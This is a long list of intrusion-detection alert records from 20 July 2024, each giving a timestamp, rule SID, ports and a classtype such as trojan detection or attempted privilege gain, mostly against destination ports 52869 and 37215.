                      Timestamp:07/20/24-23:06:02.920702
                      SID:2831300
                      Source Port:40752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.544145
                      SID:2027339
                      Source Port:43998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.609530
                      SID:2027339
                      Source Port:50848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.147931
                      SID:2025132
                      Source Port:54690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.081522
                      SID:2025132
                      Source Port:36478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2831300
                      Source Port:35140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.676864
                      SID:2027339
                      Source Port:33834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2829579
                      Source Port:47668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.601714
                      SID:2027339
                      Source Port:51018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2027339
                      Source Port:37108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.300719
                      SID:2025132
                      Source Port:35748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.449873
                      SID:2831300
                      Source Port:56338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.160884
                      SID:2025132
                      Source Port:34468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.270832
                      SID:2027339
                      Source Port:47478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.610993
                      SID:2831300
                      Source Port:50058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.178719
                      SID:2027339
                      Source Port:40990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.331311
                      SID:2831300
                      Source Port:44232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:56260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2829579
                      Source Port:36772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2025132
                      Source Port:58848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.860812
                      SID:2025132
                      Source Port:51696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.190479
                      SID:2025132
                      Source Port:53992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2027339
                      Source Port:59202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2831300
                      Source Port:49908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.625834
                      SID:2025132
                      Source Port:36344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2027339
                      Source Port:50022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:34374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.501401
                      SID:2025132
                      Source Port:55966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.862638
                      SID:2027339
                      Source Port:47168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.982338
                      SID:2027339
                      Source Port:52008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.402809
                      SID:2027339
                      Source Port:57880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.234952
                      SID:2025132
                      Source Port:54430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2831300
                      Source Port:39810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.627949
                      SID:2829579
                      Source Port:40716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.898489
                      SID:2027339
                      Source Port:57890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2835222
                      Source Port:57424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.574960
                      SID:2835222
                      Source Port:58594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2829579
                      Source Port:56158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.045965
                      SID:2027339
                      Source Port:43754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.531607
                      SID:2025132
                      Source Port:39154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2835222
                      Source Port:40842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2835222
                      Source Port:38778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:57.758895
                      SID:2025132
                      Source Port:57124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.076308
                      SID:2025132
                      Source Port:54338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.415863
                      SID:2027339
                      Source Port:41298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.830942
                      SID:2025132
                      Source Port:47590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2829579
                      Source Port:48738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2831300
                      Source Port:45314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2829579
                      Source Port:49742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.939162
                      SID:2025132
                      Source Port:33898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2831300
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.544145
                      SID:2027339
                      Source Port:58286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.714968
                      SID:2027339
                      Source Port:50866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2027339
                      Source Port:52726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2831300
                      Source Port:41710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.081357
                      SID:2831300
                      Source Port:52892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.433907
                      SID:2829579
                      Source Port:44062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.653975
                      SID:2027339
                      Source Port:46252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2831300
                      Source Port:54722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.081357
                      SID:2831300
                      Source Port:56852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.090928
                      SID:2025132
                      Source Port:42726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.854779
                      SID:2027339
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.006675
                      SID:2025132
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.381513
                      SID:2025132
                      Source Port:60842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.022949
                      SID:2025132
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.898582
                      SID:2027339
                      Source Port:36892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2831300
                      Source Port:51690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.058966
                      SID:2025132
                      Source Port:47990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.896492
                      SID:2027339
                      Source Port:40346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2831300
                      Source Port:44848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2831300
                      Source Port:51520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:60046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2835222
                      Source Port:37328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.125044
                      SID:2831300
                      Source Port:54526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.444466
                      SID:2027339
                      Source Port:52984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.057513
                      SID:2027339
                      Source Port:52980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.772858
                      SID:2025132
                      Source Port:46818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.064615
                      SID:2835222
                      Source Port:48056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.123323
                      SID:2027339
                      Source Port:52258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:37518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.233615
                      SID:2027339
                      Source Port:58912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.291750
                      SID:2025132
                      Source Port:38148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2829579
                      Source Port:53550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:57706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2831300
                      Source Port:34590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.939156
                      SID:2027339
                      Source Port:44712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.694694
                      SID:2027339
                      Source Port:35822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.576731
                      SID:2027339
                      Source Port:57374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.206868
                      SID:2027339
                      Source Port:52874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2835222
                      Source Port:53774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.998652
                      SID:2027339
                      Source Port:34844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.014309
                      SID:2027339
                      Source Port:34218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859348
                      SID:2829579
                      Source Port:51910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489810
                      SID:2831300
                      Source Port:52222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:46260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.172604
                      SID:2025132
                      Source Port:34862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.340397
                      SID:2027339
                      Source Port:50244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2829579
                      Source Port:59950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.303827
                      SID:2027339
                      Source Port:52154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.261264
                      SID:2027339
                      Source Port:55544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2027339
                      Source Port:48022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:37.539445
                      SID:2025132
                      Source Port:49318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.435154
                      SID:2831300
                      Source Port:51002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.556915
                      SID:2027339
                      Source Port:40874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.035971
                      SID:2027339
                      Source Port:42760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2027339
                      Source Port:60300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.540434
                      SID:2027339
                      Source Port:56270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.324702
                      SID:2025132
                      Source Port:41818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.297302
                      SID:2835222
                      Source Port:43358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2835222
                      Source Port:46856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2835222
                      Source Port:52336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:55138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2027339
                      Source Port:34278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:50598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.619944
                      SID:2027339
                      Source Port:38892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.972621
                      SID:2027339
                      Source Port:32926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2829579
                      Source Port:59708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.173503
                      SID:2027339
                      Source Port:42370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.055924
                      SID:2831300
                      Source Port:39028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.857962
                      SID:2025132
                      Source Port:44356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.999787
                      SID:2025132
                      Source Port:36240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.759276
                      SID:2025132
                      Source Port:60644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.187455
                      SID:2027339
                      Source Port:59662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.123303
                      SID:2831300
                      Source Port:49444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.935568
                      SID:2025132
                      Source Port:39156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:25.893173
                      SID:2027339
                      Source Port:44930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2831300
                      Source Port:57568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.443094
                      SID:2025132
                      Source Port:33650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2831300
                      Source Port:41884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.747099
                      SID:2025132
                      Source Port:49420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.536983
                      SID:2027339
                      Source Port:59140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.204539
                      SID:2027339
                      Source Port:35544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055908
                      SID:2829579
                      Source Port:47724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.588014
                      SID:2831300
                      Source Port:44588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.623283
                      SID:2027339
                      Source Port:53940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.482560
                      SID:2025132
                      Source Port:56094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2027339
                      Source Port:40960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2831300
                      Source Port:36068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.213618
                      SID:2025132
                      Source Port:57930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.625091
                      SID:2027339
                      Source Port:37846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.216159
                      SID:2027339
                      Source Port:48556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2829579
                      Source Port:35820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.080292
                      SID:2025132
                      Source Port:57220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.723902
                      SID:2027339
                      Source Port:32916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556915
                      SID:2027339
                      Source Port:41514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.855356
                      SID:2025132
                      Source Port:42572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2835222
                      Source Port:54158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.802006
                      SID:2025132
                      Source Port:44494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.373329
                      SID:2027339
                      Source Port:50342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.195370
                      SID:2027339
                      Source Port:45370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.015093
                      SID:2025132
                      Source Port:53170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2835222
                      Source Port:56936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2835222
                      Source Port:51850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.768887
                      SID:2025132
                      Source Port:58148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2831300
                      Source Port:55474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2835222
                      Source Port:52332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2835222
                      Source Port:54950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2027339
                      Source Port:56758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2835222
                      Source Port:39792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.142955
                      SID:2027339
                      Source Port:39124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.211571
                      SID:2025132
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.674473
                      SID:2831300
                      Source Port:41846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.627949
                      SID:2835222
                      Source Port:46826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.128245
                      SID:2831300
                      Source Port:53808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.182231
                      SID:2831300
                      Source Port:60894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2027339
                      Source Port:44440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:45872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:35336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.195958
                      SID:2025132
                      Source Port:49462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.580139
                      SID:2835222
                      Source Port:54258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.615405
                      SID:2027339
                      Source Port:60514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2835222
                      Source Port:34328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.204720
                      SID:2025132
                      Source Port:49496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.999691
                      SID:2027339
                      Source Port:52930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.774972
                      SID:2025132
                      Source Port:41152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.124977
                      SID:2027339
                      Source Port:37098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2835222
                      Source Port:48778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:52298
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.280799
                      SID:2831300
                      Source Port:57474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.954497
                      SID:2025132
                      Source Port:37192
                      Destination Port:52869
                      Protocol:TCP
